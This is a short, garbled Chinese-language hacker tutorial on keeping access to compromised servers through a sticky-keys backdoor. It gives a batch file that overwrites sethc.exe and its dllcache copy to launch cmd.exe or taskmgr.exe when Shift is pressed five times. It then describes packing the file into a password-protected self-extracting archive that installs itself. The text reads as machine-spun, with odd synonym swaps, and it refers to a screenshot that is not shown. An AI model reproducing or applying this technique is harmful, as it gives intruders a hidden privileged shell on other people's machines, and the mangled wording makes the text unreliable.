服务器自解压shift后门

许多当时人们取得每台虚拟主机以后都是留有1个后门程序便捷到时候进到.

虚拟主机较为流行的也是shift侧门,也修改虚拟主机内置的粘滞键为人们的侧门文档

启用方式:按持续按五下Shift只能调成

假若虚拟主机的管理人员发觉按五下shift调出去的没有如图所示的的粘滞键那麼你的虚拟主机显然是被他人侵入了。

QQ截屏20141130093641

好啦进到主題这儿黒吧安全防护网教大伙儿手工定制塑造虚拟主机自压解shift侧门

一、新创建1个shift.bat批处理內容给出

copy shift.exe %systemroot%\system32\sethc.exe /y

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc.exe /y

cmd.exe

略微懂点能看出左右二段编码的含意是将shift.exe重命名为sethc.exe且修改体系盘符拷贝到体系盘符下的 最终的cmd.exe 即启用出cmd对话框。

黑客动画吧网编本人喜爱修改资源管理器也也是立即调成资源管理器(将要cmd.exe改动为taskmgr.exe)

二、未来shift.bat加上到压缩文件

右健shift.bat–加上到压缩文件（建立自压解文件类型压缩文件加上勾）–然后点击高級–点一下密码设置–然后点击明确–点一下自压解选择项。。。

后边不愿打过 大伙儿自身看给出动态图片设定吧

到此设定进行点一下主屏幕转化成的shift.exe输入验证码只能自動安裝进行。按五下shift只能完成启用了